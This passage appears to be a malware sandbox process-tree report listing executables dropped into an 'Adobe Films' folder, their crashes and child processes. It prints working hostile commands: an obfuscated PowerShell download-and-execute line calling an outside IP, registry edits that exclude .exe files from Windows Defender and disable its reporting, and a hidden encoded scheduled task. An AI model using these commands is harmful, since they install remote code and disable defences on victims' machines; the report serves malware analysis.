                                                                          "C:\Users\Admin\Pictures\Adobe Films\soRTwtGG9awNwAigkgTrbB4M.exe"
                                                                          3⤵
                                                                            PID:4184
                                                                          • C:\Users\Admin\Pictures\Adobe Films\W9fct8QAvdW8v3tjiR6iU90x.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\W9fct8QAvdW8v3tjiR6iU90x.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1116
                                                                          • C:\Users\Admin\Pictures\Adobe Films\xaL_adAcVulInS8srggqlB9l.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\xaL_adAcVulInS8srggqlB9l.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:1020
                                                                          • C:\Users\Admin\Pictures\Adobe Films\L5rjCuufDv12Y7CS5gicfxAZ.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\L5rjCuufDv12Y7CS5gicfxAZ.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:2020
                                                                          • C:\Users\Admin\Pictures\Adobe Films\wbS1WJPeAIUWPr_VuEJg4xlp.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\wbS1WJPeAIUWPr_VuEJg4xlp.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:212
                                                                          • C:\Users\Admin\Pictures\Adobe Films\tgnD7lz2riyRYND7SB5na1X1.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\tgnD7lz2riyRYND7SB5na1X1.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3040
                                                                          • C:\Users\Admin\Pictures\Adobe Films\NrsQlD_GF0uHp1xCtFrudthy.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\NrsQlD_GF0uHp1xCtFrudthy.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:1352
                                                                          • C:\Users\Admin\Pictures\Adobe Films\D31zvFFBnngmmURwf8dUSgUl.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\D31zvFFBnngmmURwf8dUSgUl.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:3712
                                                                          • C:\Users\Admin\Pictures\Adobe Films\FNsUlH6qRajq0gGgLe6Fd6nw.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\FNsUlH6qRajq0gGgLe6Fd6nw.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1560
                                                                          • C:\Users\Admin\Pictures\Adobe Films\_CaSsp6h0kMtLskjmnqWX7Wo.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\_CaSsp6h0kMtLskjmnqWX7Wo.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:2124
                                                                          • C:\Users\Admin\Pictures\Adobe Films\mecD2agMnYDqD5KsGOVkp4vs.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\mecD2agMnYDqD5KsGOVkp4vs.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:3352
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1320
                                                                              4⤵
                                                                                PID:3868
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1324
                                                                                4⤵
                                                                                  PID:3308
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1320
                                                                                  4⤵
                                                                                    PID:3396
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1356
                                                                                    4⤵
                                                                                      PID:4052
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "mecD2agMnYDqD5KsGOVkp4vs.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mecD2agMnYDqD5KsGOVkp4vs.exe" & exit
                                                                                      4⤵
                                                                                        PID:4492
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im "mecD2agMnYDqD5KsGOVkp4vs.exe" /f
                                                                                          5⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:5000
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1180
                                                                                        4⤵
                                                                                          PID:4568
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\Mq5h6Mo323oZA1epOwdlght1.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\Mq5h6Mo323oZA1epOwdlght1.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3624
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3036 -ip 3036
                                                                                    1⤵
                                                                                      PID:2984
                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:904
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                        2⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:2000
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 608
                                                                                          3⤵
                                                                                          • Program crash
                                                                                          PID:1340
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2000 -ip 2000
                                                                                      1⤵
                                                                                        PID:2156
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3036 -ip 3036
                                                                                        1⤵
                                                                                          PID:3380
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3036 -ip 3036
                                                                                          1⤵
                                                                                            PID:4036
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3036 -ip 3036
                                                                                            1⤵
                                                                                              PID:2472
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3036 -ip 3036
                                                                                              1⤵
                                                                                                PID:3504
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3036 -ip 3036
                                                                                                1⤵
                                                                                                  PID:3956
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3036 -ip 3036
                                                                                                  1⤵
                                                                                                    PID:2036
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3036 -ip 3036
                                                                                                    1⤵
                                                                                                      PID:2160
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3036 -ip 3036
                                                                                                      1⤵
                                                                                                        PID:1368
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3036 -ip 3036
                                                                                                        1⤵
                                                                                                          PID:3240
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3036 -ip 3036
                                                                                                          1⤵
                                                                                                            PID:3396
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3036 -ip 3036
                                                                                                            1⤵
                                                                                                              PID:2656
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3036 -ip 3036
                                                                                                              1⤵
                                                                                                                PID:4036
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3036 -ip 3036
                                                                                                                1⤵
                                                                                                                  PID:336
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3036 -ip 3036
                                                                                                                  1⤵
                                                                                                                    PID:1368
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3036 -ip 3036
                                                                                                                    1⤵
                                                                                                                      PID:312
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3036 -ip 3036
                                                                                                                      1⤵
                                                                                                                        PID:3272
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3036 -ip 3036
                                                                                                                        1⤵
                                                                                                                          PID:3552
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3036 -ip 3036
                                                                                                                          1⤵
                                                                                                                            PID:4060
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3036 -ip 3036
                                                                                                                            1⤵
                                                                                                                              PID:3392
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3036 -ip 3036
                                                                                                                              1⤵
                                                                                                                                PID:3836
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2668 -ip 2668
                                                                                                                                1⤵
                                                                                                                                  PID:904
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2668 -ip 2668
                                                                                                                                  1⤵
                                                                                                                                    PID:3540
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2668 -ip 2668
                                                                                                                                    1⤵
                                                                                                                                      PID:3636
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2668 -ip 2668
                                                                                                                                      1⤵
                                                                                                                                        PID:3712
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2668 -ip 2668
                                                                                                                                        1⤵
                                                                                                                                          PID:3540
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2668 -ip 2668
                                                                                                                                          1⤵
                                                                                                                                            PID:3204
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2668 -ip 2668
                                                                                                                                            1⤵
                                                                                                                                              PID:1316
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2668 -ip 2668
                                                                                                                                              1⤵
                                                                                                                                                PID:1660
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2668 -ip 2668
                                                                                                                                                1⤵
                                                                                                                                                  PID:2844
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2668 -ip 2668
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3636
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2668 -ip 2668
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3504
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2668 -ip 2668
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3352
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2668 -ip 2668
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3184
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2668 -ip 2668
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1572
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2668 -ip 2668
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1532
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2668 -ip 2668
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3868
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2156 -ip 2156
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3544
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2156 -ip 2156
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2428
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2156 -ip 2156
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1572
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2156 -ip 2156
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2984
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2156 -ip 2156
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1104
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2156 -ip 2156
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3868
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2156 -ip 2156
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:464
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2156 -ip 2156
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3624
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Mq5h6Mo323oZA1epOwdlght1.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Mq5h6Mo323oZA1epOwdlght1.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4568
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2156 -ip 2156
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3396
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2156 -ip 2156
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3364
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2156 -ip 2156
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1020
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2156 -ip 2156
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3824
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2156 -ip 2156
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2812
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2156 -ip 2156
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2032
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2156 -ip 2156
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3028
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2156 -ip 2156
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:3272
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2156 -ip 2156
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2156 -ip 2156
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1060
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2156 -ip 2156
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:960
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2156 -ip 2156
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3352
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 624
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4532
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2156 -ip 2156
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3468
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2156 -ip 2156
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3960
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2156 -ip 2156
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:212
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2156 -ip 2156
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2864
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2124 -ip 2124
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4148
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3712 -ip 3712
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4384
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3352 -ip 3352
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4308
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 1352 -ip 1352
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4416
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2020 -ip 2020
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4472
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2124 -ip 2124
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4940
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSAD6F.tmp\Install.exe
                                                                                                                                                                                                                                  .\Install.exe /S /site_id "525403"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4988
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1536
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4052
                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:4476
                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:2956
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:3728
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3472
                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:3660
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /CREATE /TN "gJsBCsNFn" /SC once /ST 00:38:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:2588
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5072
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3352 -ip 3352
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5116
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3352 -ip 3352
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1408
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 12
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:2144
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 480
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3712 -ip 3712
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:4956
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3352 -ip 3352
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4696
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1352 -ip 1352
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4932
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
